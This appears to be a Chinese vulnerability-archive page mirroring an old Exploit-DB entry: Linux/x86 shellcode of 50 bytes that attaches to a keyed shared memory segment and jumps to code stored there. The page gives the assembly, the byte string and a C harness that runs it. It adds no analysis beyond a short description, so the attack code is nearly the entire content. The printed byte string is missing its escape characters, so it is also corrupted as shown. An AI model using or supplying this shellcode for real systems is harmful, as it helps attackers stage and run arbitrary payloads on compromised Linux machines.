Linux/x86 – Execute At Shared Memory Shellcode (50 bytes)-安全小百科

Linux/x86 – Execute At Shared Memory Shellcode (50 bytes)

漏洞ID	1054659	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13432

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* [email protected] - http://www.nopninjas.com

   Platform: Linux x86
   Length: 50 bytes
     
   - This shellcode connects to the shared memory segment matching the key
     and executes the code at that address. 

        xorl    %edi,%edi
        xorl    %esi,%esi
        xorl    %edx,%edx
        movl    $0xdeadbeef,%ecx       * shared memory key *
        xorl    %ebx,%ebx
        movb    $23,%bl
        xorl    %eax,%eax
        movb    $117,%al
        int     $0x80

        xorl    %edi,%edi
        movl    $0xbffffffa,%esi       * pointer storage location *
        xorl    %edx,%edx
        movl    %eax,%ecx
        xorl    %ebx,%ebx
        movb    $21,%bl
        xorl    %eax,%eax
        movb    $117,%al
        int     $0x80

        movl    $0xbffffffa,%eax       * pointer storage location *
        pushl   (%eax)
        ret

*/

char shm[] = "x31xffx31xf6x31xd2xb9xefxbexadxdex31xdbxb3x17x31"
             "xc0xb0x75xcdx80x31xffxbexfaxffxffxbfx31xd2x89xc1"
             "x31xdbxb3x15x31xc0xb0x75xcdx80xb8xfaxffxffxbfxff"
             "x30xc3";
              
int main() {
  void (*shell)() = (void *)&shm;
  shell();
}

// milw0rm.com [2004-09-26]

相关推荐: Magic Winmail Server 2.3 USER POP3 – Command Format String

Magic Winmail Server 2.3 USER POP3 – Command Format String 漏洞ID 1053886 漏洞类型发布时间 2003-05-23 更新时间 2003-05-23 CVE编号 N/A CNNVD-ID N/…

文章版权归作者所有，未经允许请勿转载。

THE END